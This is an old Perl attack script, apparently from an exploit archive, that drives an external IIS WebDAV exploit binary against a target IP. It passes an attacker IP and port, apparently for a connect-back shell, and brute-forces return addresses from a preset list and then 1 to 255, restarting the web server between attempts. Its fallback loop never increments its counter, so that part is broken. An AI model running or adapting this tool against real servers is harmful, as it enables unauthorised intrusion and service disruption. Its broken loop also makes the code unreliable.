home *** CD-ROM | disk | FTP | other *** search
#!/usr/bin/perl # # Written by Alon Swartz # Version 0.1 # Uses updated coros wb.exe and bruteforces return address using pre-defined values. # If not successful, it does a straight forward bruteforce (1-255) # 09/06/2003 # Version 0.2 - Being used in the SecurityForest Exploitation Framework. # Quick Fix (path) $exploitpath = "D:\\Data\\tools\\SF\\ExploitTree\\application\\webserver\\iis\\wb.exe"; @preret = ("194","195","193","191","196","192","197","198","199","208","209","205","206","12","215","200","201","202","203","204","207","208"); if ($#ARGV != 2) {die "Usage: webdav-brute.pl <target_ip> <attackers_ip> <attackers_port>\n\nCoded by Alon Swartz, v0.2\nUpdated coro's wb.exe and bruteforces return address using pre-defined values\nIf not successful, it does a straight forward bruteforce (1-255)\n";} $target_ip = @ARGV[0]; $attackers_ip = @ARGV[1]; $attackers_port = @ARGV[2]; print "Loading ret values: @preret\n\n"; foreach $preret (@preret) { print "\n\n-----------------------------\n[ret: $preret -ASCII]"; system "$exploitpath $target_ip $attackers_ip $attackers_port $preret"; print "Waiting for webserver to restart...\n"; sleep 10; } print "If we get here, the pre-defined rets were not successful, chances are slim we will succeed\n"; $i=1; while ($i < 256) { print "[ret: $i]-ASCII\n"; system "$exploitpath $target_ip $attackers_ip $attackers_port $i"; print "Waiting for webserver to restart itself\n"; sleep 10; } 
